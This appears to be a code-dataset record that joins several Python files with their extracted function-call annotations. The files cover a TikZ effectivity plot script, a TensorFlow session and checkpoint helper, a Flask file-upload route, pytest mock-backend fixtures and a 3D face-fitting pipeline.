make_fingerprint as mf\n'), ((2436, 2470), 'os.path.isfile', 'os.path.isfile', (['test_csv_file_name'], {}), '(test_csv_file_name)\n', (2450, 2470), False, 'import os\n'), ((2586, 2639), 'data.save_fingerprint_as_csv', 'data.save_fingerprint_as_csv', (['test_csv_file_name', 'fps'], {}), '(test_csv_file_name, fps)\n', (2614, 2639), False, 'import data\n'), ((2720, 2751), 'pandas.read_csv', 'pd.read_csv', (['test_csv_file_name'], {}), '(test_csv_file_name)\n', (2731, 2751), True, 'import pandas as pd\n'), ((2761, 2790), 'os.remove', 'os.remove', (['test_csv_file_name'], {}), '(test_csv_file_name)\n', (2770, 2790), False, 'import os\n'), ((2480, 2509), 'os.remove', 'os.remove', (['test_csv_file_name'], {}), '(test_csv_file_name)\n', (2489, 2509), False, 'import os\n'), ((2521, 2555), 'os.path.isfile', 'os.path.isfile', (['test_csv_file_name'], {}), '(test_csv_file_name)\n', (2535, 2555), False, 'import os\n'), ((2667, 2701), 'os.path.isfile', 'os.path.isfile', (['test_csv_file_name'], {}), '(test_csv_file_name)\n', (2681, 2701), False, 'import os\n')] |
from __future__ import print_function
import tikzplots as tkz
import argparse
import numpy as np
import re
def parse_data_file(fname):
with open(fname, 'r') as fp:
lines = fp.readlines()
# Read in the first line, and find the comma-separated values
# in the header
hline = lines[0]
for index, h in enumerate(hline):
if h == '=':
hstr = hline[index+1:].split(',')
# Strip away any white space
header = []
for h in hstr:
header.append(h.strip())
data = []
for line in lines[1:]:
dline = []
for entry in line.split():
dline.append(float(entry))
data.append(dline)
return header, np.array(data)
# Create an argument parser to read in arguments from the commnad line
p = argparse.ArgumentParser()
p.add_argument('--files', nargs='+', type=str, help='List of files')
p.add_argument('--labels', nargs='+', type=str, help='List of labels')
p.add_argument('--outfile', type=str, default='output.tex')
p.add_argument('--plot', type=str, default='effectivity')
args = p.parse_args()
# Set the colors to use for each set of bars
colors = []
for i in range(10):
colors.append('tableau%d'%(i))
tikzcolors = '''
\definecolor{tableau0}{RGB}{31,119,180}
\definecolor{tableau1}{RGB}{255,158,74}
\definecolor{tableau2}{RGB}{103,191,92}
\definecolor{tableau3}{RGB}{237,102,93}
\definecolor{tableau4}{RGB}{148,103,189}
\definecolor{tableau5}{RGB}{168,120,110}
\definecolor{tableau6}{RGB}{237,151,202}
\definecolor{tableau7}{RGB}{162,162,162}
\definecolor{tableau8}{RGB}{205,204,93}
\definecolor{tableau9}{RGB}{109,204,218}
'''
data = []
for fname in args.files:
try:
header, dat = parse_data_file(fname)
except:
print('fname = ', fname)
data.append(dat)
# Plot the error on the y-axis
nnodes_index = header.index('nnodes')
fval_eff_index = header.index('fval_effectivity')
indc_eff_index = header.index('indicator_effectivity')
# Find the max value of y
xmin = 1e20
xmax = 0
ymin = 0
ymax = 0
# Look through all the data
for d in data:
xmin = min(xmin, np.min(d[:, nnodes_index]))
xmax = max(xmax, np.max(d[:, nnodes_index]))
if args.plot == 'effectivity':
ymax = max(ymax, np.max(d[:, fval_eff_index]))
ymax = min(ymax, 100)
else:
ymax = max(ymax, np.max(d[:, indc_eff_index]))
ymax = min(ymax, 500)
# Round to the nearest multiple of 10
xmin = int(np.floor(np.log10(xmin)))
xmax = int(np.ceil(np.log10(xmax)))
# Create a range
xticks = np.linspace(xmin, xmax, xmax - xmin + 1)
xtick_labels = []
for exp in range(xmin, xmax + 1, 1):
xtick_labels.append('$10^{%d}$'%(exp))
# Set the positions of the tick locations
if ymax < 2.0:
ymax_int = int(np.ceil(4.0*ymax))
ymax = ymax_int/4.0
yticks = np.linspace(0, ymax, ymax_int+1)
ytick_labels = yticks
elif ymax < 10:
ymax = int(np.ceil(ymax))
yticks = np.linspace(0, ymax, ymax+1)
ytick_labels = range(ymax+1)
elif ymax < 20:
ymax = 2*int(np.ceil(ymax/2.0))
yticks = np.linspace(0, ymax, ymax+1)
ytick_labels = range(0, ymax+1, 2)
yticks = np.linspace(0, ymax, ymax/2 + 1)
else:
ymax = 5*int(np.ceil(ymax/5.0))
yticks = np.linspace(0, ymax, ymax+1)
ytick_labels = range(0, ymax+1, 5)
yticks = np.linspace(0, ymax, ymax/5 + 1)
# The overall dimensions
xdim = 2.0
xscale = xdim/(xmax - xmin)
ydim = 1.75
yscale = ydim/(ymax - ymin)
# Get the header info
s = tkz.get_header()
s += tkz.get_begin_tikz(xdim=1.5, ydim=1.5, xunit='in', yunit='in')
s += tikzcolors
symbols = ['circle', 'square', 'triangle', 'delta', 'diamond']
for k, d in enumerate(data):
xvals = np.log10(d[:, nnodes_index])
if args.plot == 'effectivity':
yvals = d[:, fval_eff_index]
else:
yvals = d[:, indc_eff_index]
s += tkz.get_2d_plot(xvals, yvals,
line_dim='very thick',
color=colors[k % 10],
symbol=symbols[k % 4],
symbol_size=0.035,
xscale=xscale, yscale=yscale,
xmin=xmin, xmax=xmax,
ymin=ymin, ymax=ymax)
# Set the labels (lower-right corner)
if args.labels is not None:
for k, label in enumerate(args.labels):
x = xmin + 0.75*(xmax - xmin)
y = ymin + 0.05*(ymax - ymin)*(len(args.labels)-k)
length = 0.035*(xmax - xmin)
s += tkz.get_legend_entry(x, y, length, label=label,
font_size='small',
line_dim='very thick',
color=colors[k % 10], symbol=symbols[k % 4],
symbol_size=0.035,
xscale=xscale, yscale=yscale)
if args.plot == 'effectivity':
title = 'Effectivity'
else:
title = 'Indicator effectivity'
# Plot the axes
s += tkz.get_2d_axes(xmin, xmax, ymin, ymax,
xscale=xscale, yscale=yscale,
xticks=xticks, yticks=yticks,
xtick_labels=xtick_labels,
ytick_labels=ytick_labels,
tick_font='normalsize',
tick_frac=0.01,
xlabel_offset=0.085,
label_font='Large',
xlabel='Number of nodes',
ylabel_offset=0.175,
ylabel=title)
s += tkz.get_end_tikz()
fp = open(args.outfile, 'w')
fp.write(s)
fp.close()
| [
"numpy.ceil",
"numpy.log10",
"tikzplots.get_legend_entry",
"argparse.ArgumentParser",
"tikzplots.get_2d_plot",
"numpy.max",
"tikzplots.get_2d_axes",
"numpy.array",
"numpy.linspace",
"tikzplots.get_end_tikz",
"tikzplots.get_begin_tikz",
"numpy.min",
"tikzplots.get_header"
] | [((861, 886), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (884, 886), False, 'import argparse\n'), ((2602, 2642), 'numpy.linspace', 'np.linspace', (['xmin', 'xmax', '(xmax - xmin + 1)'], {}), '(xmin, xmax, xmax - xmin + 1)\n', (2613, 2642), True, 'import numpy as np\n'), ((3535, 3551), 'tikzplots.get_header', 'tkz.get_header', ([], {}), '()\n', (3549, 3551), True, 'import tikzplots as tkz\n'), ((3557, 3619), 'tikzplots.get_begin_tikz', 'tkz.get_begin_tikz', ([], {'xdim': '(1.5)', 'ydim': '(1.5)', 'xunit': '"""in"""', 'yunit': '"""in"""'}), "(xdim=1.5, ydim=1.5, xunit='in', yunit='in')\n", (3575, 3619), True, 'import tikzplots as tkz\n'), ((5010, 5324), 'tikzplots.get_2d_axes', 'tkz.get_2d_axes', (['xmin', 'xmax', 'ymin', 'ymax'], {'xscale': 'xscale', 'yscale': 'yscale', 'xticks': 'xticks', 'yticks': 'yticks', 'xtick_labels': 'xtick_labels', 'ytick_labels': 'ytick_labels', 'tick_font': '"""normalsize"""', 'tick_frac': '(0.01)', 'xlabel_offset': '(0.085)', 'label_font': '"""Large"""', 'xlabel': '"""Number of nodes"""', 'ylabel_offset': '(0.175)', 'ylabel': 'title'}), "(xmin, xmax, ymin, ymax, xscale=xscale, yscale=yscale,\n xticks=xticks, yticks=yticks, xtick_labels=xtick_labels, ytick_labels=\n ytick_labels, tick_font='normalsize', tick_frac=0.01, xlabel_offset=\n 0.085, label_font='Large', xlabel='Number of nodes', ylabel_offset=\n 0.175, ylabel=title)\n", (5025, 5324), True, 'import tikzplots as tkz\n'), ((5543, 5561), 'tikzplots.get_end_tikz', 'tkz.get_end_tikz', ([], {}), '()\n', (5559, 5561), True, 'import tikzplots as tkz\n'), ((2874, 2908), 'numpy.linspace', 'np.linspace', (['(0)', 'ymax', '(ymax_int + 1)'], {}), '(0, ymax, ymax_int + 1)\n', (2885, 2908), True, 'import numpy as np\n'), ((3743, 3771), 'numpy.log10', 'np.log10', (['d[:, nnodes_index]'], {}), '(d[:, nnodes_index])\n', (3751, 3771), True, 'import numpy as np\n'), ((3901, 4099), 'tikzplots.get_2d_plot', 'tkz.get_2d_plot', (['xvals', 'yvals'], {'line_dim': '"""very 
thick"""', 'color': 'colors[k % 10]', 'symbol': 'symbols[k % 4]', 'symbol_size': '(0.035)', 'xscale': 'xscale', 'yscale': 'yscale', 'xmin': 'xmin', 'xmax': 'xmax', 'ymin': 'ymin', 'ymax': 'ymax'}), "(xvals, yvals, line_dim='very thick', color=colors[k % 10],\n symbol=symbols[k % 4], symbol_size=0.035, xscale=xscale, yscale=yscale,\n xmin=xmin, xmax=xmax, ymin=ymin, ymax=ymax)\n", (3916, 4099), True, 'import tikzplots as tkz\n'), ((2170, 2196), 'numpy.min', 'np.min', (['d[:, nnodes_index]'], {}), '(d[:, nnodes_index])\n', (2176, 2196), True, 'import numpy as np\n'), ((2219, 2245), 'numpy.max', 'np.max', (['d[:, nnodes_index]'], {}), '(d[:, nnodes_index])\n', (2225, 2245), True, 'import numpy as np\n'), ((2522, 2536), 'numpy.log10', 'np.log10', (['xmin'], {}), '(xmin)\n', (2530, 2536), True, 'import numpy as np\n'), ((2558, 2572), 'numpy.log10', 'np.log10', (['xmax'], {}), '(xmax)\n', (2566, 2572), True, 'import numpy as np\n'), ((2818, 2837), 'numpy.ceil', 'np.ceil', (['(4.0 * ymax)'], {}), '(4.0 * ymax)\n', (2825, 2837), True, 'import numpy as np\n'), ((2992, 3022), 'numpy.linspace', 'np.linspace', (['(0)', 'ymax', '(ymax + 1)'], {}), '(0, ymax, ymax + 1)\n', (3003, 3022), True, 'import numpy as np\n'), ((4526, 4719), 'tikzplots.get_legend_entry', 'tkz.get_legend_entry', (['x', 'y', 'length'], {'label': 'label', 'font_size': '"""small"""', 'line_dim': '"""very thick"""', 'color': 'colors[k % 10]', 'symbol': 'symbols[k % 4]', 'symbol_size': '(0.035)', 'xscale': 'xscale', 'yscale': 'yscale'}), "(x, y, length, label=label, font_size='small', line_dim\n ='very thick', color=colors[k % 10], symbol=symbols[k % 4], symbol_size\n =0.035, xscale=xscale, yscale=yscale)\n", (4546, 4719), True, 'import tikzplots as tkz\n'), ((770, 784), 'numpy.array', 'np.array', (['data'], {}), '(data)\n', (778, 784), True, 'import numpy as np\n'), ((2308, 2336), 'numpy.max', 'np.max', (['d[:, fval_eff_index]'], {}), '(d[:, fval_eff_index])\n', (2314, 2336), True, 'import numpy as np\n'), 
((2403, 2431), 'numpy.max', 'np.max', (['d[:, indc_eff_index]'], {}), '(d[:, indc_eff_index])\n', (2409, 2431), True, 'import numpy as np\n'), ((2964, 2977), 'numpy.ceil', 'np.ceil', (['ymax'], {}), '(ymax)\n', (2971, 2977), True, 'import numpy as np\n'), ((3119, 3149), 'numpy.linspace', 'np.linspace', (['(0)', 'ymax', '(ymax + 1)'], {}), '(0, ymax, ymax + 1)\n', (3130, 3149), True, 'import numpy as np\n'), ((3200, 3234), 'numpy.linspace', 'np.linspace', (['(0)', 'ymax', '(ymax / 2 + 1)'], {}), '(0, ymax, ymax / 2 + 1)\n', (3211, 3234), True, 'import numpy as np\n'), ((3288, 3318), 'numpy.linspace', 'np.linspace', (['(0)', 'ymax', '(ymax + 1)'], {}), '(0, ymax, ymax + 1)\n', (3299, 3318), True, 'import numpy as np\n'), ((3369, 3403), 'numpy.linspace', 'np.linspace', (['(0)', 'ymax', '(ymax / 5 + 1)'], {}), '(0, ymax, ymax / 5 + 1)\n', (3380, 3403), True, 'import numpy as np\n'), ((3087, 3106), 'numpy.ceil', 'np.ceil', (['(ymax / 2.0)'], {}), '(ymax / 2.0)\n', (3094, 3106), True, 'import numpy as np\n'), ((3256, 3275), 'numpy.ceil', 'np.ceil', (['(ymax / 5.0)'], {}), '(ymax / 5.0)\n', (3263, 3275), True, 'import numpy as np\n')] |
import tensorflow as tf
import numpy as np
import os
class TFModel(object):
'''
This class contains the general functions for a tensorflow model
'''
def __init__(self, config):
# Limit the TensorFlow's logs
#os.environ['TF_CPP_MIN_LOG_LEVEL'] = '4'
# tf.logging.set_verbosity(tf.logging.ERROR)
self.config = config
self.sess = None
self.saver = None
def initialize_session(self):
"""
Set configurations:
* allow_soft_placement : If True, will allow models trained
on GPU to be deployed unto CPU
* log_device_placement : If True, will print the hardware
and operations that have been placed on it
"""
sess_conf = tf.ConfigProto(allow_soft_placement=True,
log_device_placement=False)
sess_conf.gpu_options.allow_growth = True
self.sess = tf.Session(config=sess_conf)
# Save object
if not self.config.save == None:
self.saver = tf.train.Saver()
# Initialize all variables
self.sess.run(tf.global_variables_initializer())
def save_model(self, fold, timestamp, name):
"""
Save the model and the config file
"""
model_name = name + "_" + timestamp
main_dir = "./checkpoints/" + model_name + "/"
# Check main model dir
if not os.path.exists(main_dir):
os.makedirs(main_dir)
# If using K-Fold Cross Validation, save each model
if self.config.k_folds > 1:
dir = main_dir + "Fold_" + str(fold + 1) + "/"
# Create Fold dir
if not os.path.exists(dir):
os.makedirs(dir)
# Save the model
self.saver.save(self.sess, dir)
else:
self.saver.save(self.sess, main_dir)
return main_dir
def ner_save(self, fold, timestamp, name, ep):
# Save the model
main_dir = self.save_model(fold, timestamp, name)
# Save the corresponding config file
if fold == 0:
np.savez(main_dir + "config",
model=self.config.model,
k_folds=self.config.k_folds,
words=self.config.words,
tags=self.config.tags,
chars=self.config.chars,
use_crf=self.config.use_crf,
epoch=ep+1)
def class_save(self, fold, timestamp, name, ep):
# Save the model
main_dir = self.save_model(fold, timestamp, name)
# Save the config file
if fold == 0:
np.savez(main_dir + "config",
model=self.config.model,
k_folds=self.config.k_folds,
words=self.config.words,
chars=self.config.chars,
epoch=ep+1)
def close_session(self):
self.sess.close()
tf.reset_default_graph()
| [
"os.path.exists",
"numpy.savez",
"tensorflow.reset_default_graph",
"os.makedirs",
"tensorflow.Session",
"tensorflow.train.Saver",
"tensorflow.global_variables_initializer",
"tensorflow.ConfigProto"
] | [((847, 916), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {'allow_soft_placement': '(True)', 'log_device_placement': '(False)'}), '(allow_soft_placement=True, log_device_placement=False)\n', (861, 916), True, 'import tensorflow as tf\n'), ((1022, 1050), 'tensorflow.Session', 'tf.Session', ([], {'config': 'sess_conf'}), '(config=sess_conf)\n', (1032, 1050), True, 'import tensorflow as tf\n'), ((3074, 3098), 'tensorflow.reset_default_graph', 'tf.reset_default_graph', ([], {}), '()\n', (3096, 3098), True, 'import tensorflow as tf\n'), ((1140, 1156), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (1154, 1156), True, 'import tensorflow as tf\n'), ((1215, 1248), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (1246, 1248), True, 'import tensorflow as tf\n'), ((1517, 1541), 'os.path.exists', 'os.path.exists', (['main_dir'], {}), '(main_dir)\n', (1531, 1541), False, 'import os\n'), ((1555, 1576), 'os.makedirs', 'os.makedirs', (['main_dir'], {}), '(main_dir)\n', (1566, 1576), False, 'import os\n'), ((2212, 2421), 'numpy.savez', 'np.savez', (["(main_dir + 'config')"], {'model': 'self.config.model', 'k_folds': 'self.config.k_folds', 'words': 'self.config.words', 'tags': 'self.config.tags', 'chars': 'self.config.chars', 'use_crf': 'self.config.use_crf', 'epoch': '(ep + 1)'}), "(main_dir + 'config', model=self.config.model, k_folds=self.config.\n k_folds, words=self.config.words, tags=self.config.tags, chars=self.\n config.chars, use_crf=self.config.use_crf, epoch=ep + 1)\n", (2220, 2421), True, 'import numpy as np\n'), ((2759, 2911), 'numpy.savez', 'np.savez', (["(main_dir + 'config')"], {'model': 'self.config.model', 'k_folds': 'self.config.k_folds', 'words': 'self.config.words', 'chars': 'self.config.chars', 'epoch': '(ep + 1)'}), "(main_dir + 'config', model=self.config.model, k_folds=self.config.\n k_folds, words=self.config.words, chars=self.config.chars, epoch=ep + 1)\n", (2767, 2911), True, 'import 
numpy as np\n'), ((1782, 1801), 'os.path.exists', 'os.path.exists', (['dir'], {}), '(dir)\n', (1796, 1801), False, 'import os\n'), ((1819, 1835), 'os.makedirs', 'os.makedirs', (['dir'], {}), '(dir)\n', (1830, 1835), False, 'import os\n')] |
from flask import Flask, request, jsonify
app = Flask(__name__)
@app.route('/upload', methods=['POST'])
def index():
image_files = request.files.getlist('image')
video_files = request.files.getlist('video')
if not image_files and not video_files:
return jsonify({
"code": -1,
"message": "No upload images or videos."
})
for image_file in image_files:
image_file.save(image_file.filename)
for video_file in video_files:
video_file.save(video_file.filename)
return jsonify({
"code": 0,
"message": "upload images and videos success."
})
if __name__ == '__main__':
app.run('0.0.0.0', debug=True, port=5000)
| [
"flask.jsonify",
"flask.request.files.getlist",
"flask.Flask"
] | [((49, 64), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (54, 64), False, 'from flask import Flask, request, jsonify\n'), ((138, 168), 'flask.request.files.getlist', 'request.files.getlist', (['"""image"""'], {}), "('image')\n", (159, 168), False, 'from flask import Flask, request, jsonify\n'), ((187, 217), 'flask.request.files.getlist', 'request.files.getlist', (['"""video"""'], {}), "('video')\n", (208, 217), False, 'from flask import Flask, request, jsonify\n'), ((550, 618), 'flask.jsonify', 'jsonify', (["{'code': 0, 'message': 'upload images and videos success.'}"], {}), "({'code': 0, 'message': 'upload images and videos success.'})\n", (557, 618), False, 'from flask import Flask, request, jsonify\n'), ((278, 341), 'flask.jsonify', 'jsonify', (["{'code': -1, 'message': 'No upload images or videos.'}"], {}), "({'code': -1, 'message': 'No upload images or videos.'})\n", (285, 341), False, 'from flask import Flask, request, jsonify\n')] |
import logging
from dataclasses import dataclass
from unittest.mock import patch
import pytest
from tests.utils.mock_backend import (
ApiKey,
BackendContext,
Run,
Project,
Team,
User,
)
from tests.utils.mock_base_client import MockBaseClient
########################################
########### BackendContext #############
########################################
@dataclass
class DefaultData:
user: User
api_key: ApiKey
team: Team
project: Project
run: Run
@pytest.fixture(scope="session")
def default_data() -> DefaultData:
user = User()
api_key = ApiKey(user.Id)
team = Team(user.Id, isPersonal=True)
project = Project(team.Id)
run = Run(userId=user.Id, teamId=team.Id, projectId=project.Id)
return DefaultData(user=user, api_key=api_key, team=team, project=project, run=run)
@pytest.fixture(scope="function", autouse=True)
def patch_ctx(default_data: DefaultData):
logging.info("Patching tests.utils.mock_backend.ctx to have default values")
ctx = BackendContext()
for (k, v) in default_data.__dict__.items():
ctx.set(k, v)
with patch("tests.utils.mock_backend.ctx", ctx):
logging.info("Successfully patched tests.utils.mock_backend.ctx")
yield
logging.info("unpatching tests.utils.mock_backend.ctx back to fresh state")
@pytest.fixture(scope="session", autouse=True)
def patch_base_client():
with patch("manta_lab.api.client._BaseClient", MockBaseClient):
logging.info("Successfully patched manta_lab.api.client_BaseClient with MockBaseClient")
yield
logging.info("unpatching manta_lab.api.client_BaseClient")
# @pytest.fixture()
# def run(request):
# marker = request.node.get_closest_marker("manta_args")
# kwargs = marker.kwargs if marker else dict(env={})
# for k, v in kwargs["env"].items():
# os.environ[k] = v
# # TODO: should be create run by manta.init
# s = Settings()
# s.update_envs(kwargs["env"])
# return Run(settings=s)
| [
"tests.utils.mock_backend.Team",
"tests.utils.mock_backend.User",
"logging.info",
"tests.utils.mock_backend.Project",
"pytest.fixture",
"unittest.mock.patch",
"tests.utils.mock_backend.ApiKey",
"tests.utils.mock_backend.Run",
"tests.utils.mock_backend.BackendContext"
] | [((541, 572), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""session"""'}), "(scope='session')\n", (555, 572), False, 'import pytest\n'), ((898, 944), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""function"""', 'autouse': '(True)'}), "(scope='function', autouse=True)\n", (912, 944), False, 'import pytest\n'), ((1408, 1453), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""session"""', 'autouse': '(True)'}), "(scope='session', autouse=True)\n", (1422, 1453), False, 'import pytest\n'), ((621, 627), 'tests.utils.mock_backend.User', 'User', ([], {}), '()\n', (625, 627), False, 'from tests.utils.mock_backend import ApiKey, BackendContext, Run, Project, Team, User\n'), ((643, 658), 'tests.utils.mock_backend.ApiKey', 'ApiKey', (['user.Id'], {}), '(user.Id)\n', (649, 658), False, 'from tests.utils.mock_backend import ApiKey, BackendContext, Run, Project, Team, User\n'), ((671, 701), 'tests.utils.mock_backend.Team', 'Team', (['user.Id'], {'isPersonal': '(True)'}), '(user.Id, isPersonal=True)\n', (675, 701), False, 'from tests.utils.mock_backend import ApiKey, BackendContext, Run, Project, Team, User\n'), ((717, 733), 'tests.utils.mock_backend.Project', 'Project', (['team.Id'], {}), '(team.Id)\n', (724, 733), False, 'from tests.utils.mock_backend import ApiKey, BackendContext, Run, Project, Team, User\n'), ((745, 802), 'tests.utils.mock_backend.Run', 'Run', ([], {'userId': 'user.Id', 'teamId': 'team.Id', 'projectId': 'project.Id'}), '(userId=user.Id, teamId=team.Id, projectId=project.Id)\n', (748, 802), False, 'from tests.utils.mock_backend import ApiKey, BackendContext, Run, Project, Team, User\n'), ((993, 1069), 'logging.info', 'logging.info', (['"""Patching tests.utils.mock_backend.ctx to have default values"""'], {}), "('Patching tests.utils.mock_backend.ctx to have default values')\n", (1005, 1069), False, 'import logging\n'), ((1083, 1099), 'tests.utils.mock_backend.BackendContext', 'BackendContext', ([], {}), '()\n', (1097, 1099), False, 
'from tests.utils.mock_backend import ApiKey, BackendContext, Run, Project, Team, User\n'), ((1326, 1401), 'logging.info', 'logging.info', (['"""unpatching tests.utils.mock_backend.ctx back to fresh state"""'], {}), "('unpatching tests.utils.mock_backend.ctx back to fresh state')\n", (1338, 1401), False, 'import logging\n'), ((1669, 1727), 'logging.info', 'logging.info', (['"""unpatching manta_lab.api.client_BaseClient"""'], {}), "('unpatching manta_lab.api.client_BaseClient')\n", (1681, 1727), False, 'import logging\n'), ((1185, 1227), 'unittest.mock.patch', 'patch', (['"""tests.utils.mock_backend.ctx"""', 'ctx'], {}), "('tests.utils.mock_backend.ctx', ctx)\n", (1190, 1227), False, 'from unittest.mock import patch\n'), ((1238, 1303), 'logging.info', 'logging.info', (['"""Successfully patched tests.utils.mock_backend.ctx"""'], {}), "('Successfully patched tests.utils.mock_backend.ctx')\n", (1250, 1303), False, 'import logging\n'), ((1490, 1547), 'unittest.mock.patch', 'patch', (['"""manta_lab.api.client._BaseClient"""', 'MockBaseClient'], {}), "('manta_lab.api.client._BaseClient', MockBaseClient)\n", (1495, 1547), False, 'from unittest.mock import patch\n'), ((1558, 1651), 'logging.info', 'logging.info', (['"""Successfully patched manta_lab.api.client_BaseClient with MockBaseClient"""'], {}), "(\n 'Successfully patched manta_lab.api.client_BaseClient with MockBaseClient')\n", (1570, 1651), False, 'import logging\n')] |
"""
Run this class to save the 3D face tracking pipeline into a folder.
"""
import cv2
import os
import time
import utils
import face_alignment as fa
import face_detection as fd
import face_fit as ff
input_folder = './data/source/' # The input images path.
output_folder = './data/results/' # The output images path.
if not os.path.exists(output_folder):
os.makedirs(output_folder)
files = os.listdir(input_folder)
count = 1
for file in files:
output_name = 'image_' + str(count)
img = cv2.imread(input_folder + file, cv2.IMREAD_COLOR)
h, w, _ = img.shape
if img is not None:
print('Processing ' + output_name + ':')
start = time.time()
bboxes = fd.detect_faces(img, detector=fd.Face_Detector.DLIB)
elapsed_time_1 = time.time() - start
print('\tface detection: %.5f sec' % elapsed_time_1)
if len(bboxes):
bboxes_img = fd.draw_bboxes(img.copy(), bboxes)
cv2.imwrite(output_folder + output_name + '_1.jpg', bboxes_img)
start = time.time()
new_bboxes = fd.resize_bboxes(bboxes)
elapsed_time_2 = time.time() - start
print('\tbbox resizing: %.5f sec' % elapsed_time_2)
new_bboxes_img = fd.draw_bboxes(img.copy(), new_bboxes)
cv2.imwrite(output_folder + output_name + '_2.jpg', new_bboxes_img)
start = time.time()
crops = fd.crop_faces(img, new_bboxes)
elapsed_time_3 = time.time() - start
print('\tface cropping: %.5f sec' % elapsed_time_3)
count_crops = 0
for crop_img in crops:
print('\t\tCrop ' + str(count_crops) + ':')
crop_h, crop_w, _ = crop_img.shape
cv2.imwrite(output_folder + output_name + '_3_' + str(count_crops) + '.jpg', crop_img)
start = time.time()
new_img = utils.resize_image(crop_img.copy(), width=fa.std_size, height=fa.std_size)
elapsed_time_4 = time.time() - start
print('\t\t\tcrop resizing: %.5f sec' % elapsed_time_4)
cv2.imwrite(output_folder + output_name + '_4_' + str(count_crops) + '.jpg', new_img)
start = time.time()
pitch, yaw, roll, scale, rotation, t3d, cam_matrix, landmarks, factor = fa.predict_pose(new_img, new_bboxes[count_crops], dense=False)
elapsed_time_5 = time.time() - start
print('\t\t\tpose prediction: %.5f sec' % elapsed_time_5)
lmks_image = fd.draw_landmarks(img.copy(), landmarks, drawer=fd.Face_Landmarks_Drawer.DDFA)
cv2.imwrite(output_folder + output_name + '_5_' + str(count_crops) + '.jpg', lmks_image)
start = time.time()
fit_img, fit_kpts = ff.fit_3dmm(rotation, t3d, scale * factor, width=crop_w, height=crop_h)
elapsed_time_6 = time.time() - start
print('\t\t\tface fitting: %.5f sec' % elapsed_time_6)
cv2.imwrite(output_folder + output_name + '_6_' + str(count_crops) + '.png', fit_img)
fit_lmks_img = fd.draw_landmarks(fit_img.copy(), fit_kpts, drawer=fd.Face_Landmarks_Drawer.FACE3D)
cv2.imwrite(output_folder + output_name + '_7_' + str(count_crops) + '.jpg', fit_lmks_img)
start = time.time()
fore_lmks, back_lmks = utils.landmarks_to_np_array(fit_kpts, landmarks)
elapsed_time_7 = time.time() - start
print('\t\t\tlandmarks setting: %.5f sec' % elapsed_time_7)
start = time.time()
homography, mask = cv2.findHomography(fore_lmks, back_lmks, cv2.RANSAC)
elapsed_time_8 = time.time() - start
print('\t\t\thomography computation: %.5f sec' % elapsed_time_8)
start = time.time()
warp_img = cv2.warpPerspective(fit_img, homography, (w, h))
elapsed_time_9 = time.time() - start
print('\t\t\twarp perspective: %.5f sec' % elapsed_time_9)
cv2.imwrite(output_folder + output_name + '_8_' + str(count_crops) + '.png', warp_img)
start = time.time()
blend_img = utils.create_transparent_overlay_faster(warp_img, img, w, h)
elapsed_time_10 = time.time() - start
print('\t\t\ttransparent overlay: %.5f sec' % elapsed_time_10)
cv2.imwrite(output_folder + output_name + '_9_' + str(count_crops) + '.jpg', blend_img)
count_crops += 1
print('\t\t\telapsed time: %.5f' % (elapsed_time_1 + elapsed_time_2 + elapsed_time_3 + elapsed_time_4 + elapsed_time_5 + elapsed_time_6
+ elapsed_time_7 + elapsed_time_8 + elapsed_time_9 + elapsed_time_10))
print('\tfitted succefully!')
count += 1
| [
"face_detection.crop_faces",
"os.path.exists",
"cv2.imwrite",
"os.listdir",
"os.makedirs",
"face_fit.fit_3dmm",
"utils.landmarks_to_np_array",
"cv2.findHomography",
"utils.create_transparent_overlay_faster",
"cv2.warpPerspective",
"time.time",
"face_alignment.predict_pose",
"face_detection.r... | [((402, 426), 'os.listdir', 'os.listdir', (['input_folder'], {}), '(input_folder)\n', (412, 426), False, 'import os\n'), ((327, 356), 'os.path.exists', 'os.path.exists', (['output_folder'], {}), '(output_folder)\n', (341, 356), False, 'import os\n'), ((362, 388), 'os.makedirs', 'os.makedirs', (['output_folder'], {}), '(output_folder)\n', (373, 388), False, 'import os\n'), ((508, 557), 'cv2.imread', 'cv2.imread', (['(input_folder + file)', 'cv2.IMREAD_COLOR'], {}), '(input_folder + file, cv2.IMREAD_COLOR)\n', (518, 557), False, 'import cv2\n'), ((685, 696), 'time.time', 'time.time', ([], {}), '()\n', (694, 696), False, 'import time\n'), ((714, 766), 'face_detection.detect_faces', 'fd.detect_faces', (['img'], {'detector': 'fd.Face_Detector.DLIB'}), '(img, detector=fd.Face_Detector.DLIB)\n', (729, 766), True, 'import face_detection as fd\n'), ((792, 803), 'time.time', 'time.time', ([], {}), '()\n', (801, 803), False, 'import time\n'), ((982, 1045), 'cv2.imwrite', 'cv2.imwrite', (["(output_folder + output_name + '_1.jpg')", 'bboxes_img'], {}), "(output_folder + output_name + '_1.jpg', bboxes_img)\n", (993, 1045), False, 'import cv2\n'), ((1079, 1090), 'time.time', 'time.time', ([], {}), '()\n', (1088, 1090), False, 'import time\n'), ((1116, 1140), 'face_detection.resize_bboxes', 'fd.resize_bboxes', (['bboxes'], {}), '(bboxes)\n', (1132, 1140), True, 'import face_detection as fd\n'), ((1357, 1424), 'cv2.imwrite', 'cv2.imwrite', (["(output_folder + output_name + '_2.jpg')", 'new_bboxes_img'], {}), "(output_folder + output_name + '_2.jpg', new_bboxes_img)\n", (1368, 1424), False, 'import cv2\n'), ((1458, 1469), 'time.time', 'time.time', ([], {}), '()\n', (1467, 1469), False, 'import time\n'), ((1490, 1520), 'face_detection.crop_faces', 'fd.crop_faces', (['img', 'new_bboxes'], {}), '(img, new_bboxes)\n', (1503, 1520), True, 'import face_detection as fd\n'), ((1170, 1181), 'time.time', 'time.time', ([], {}), '()\n', (1179, 1181), False, 'import 
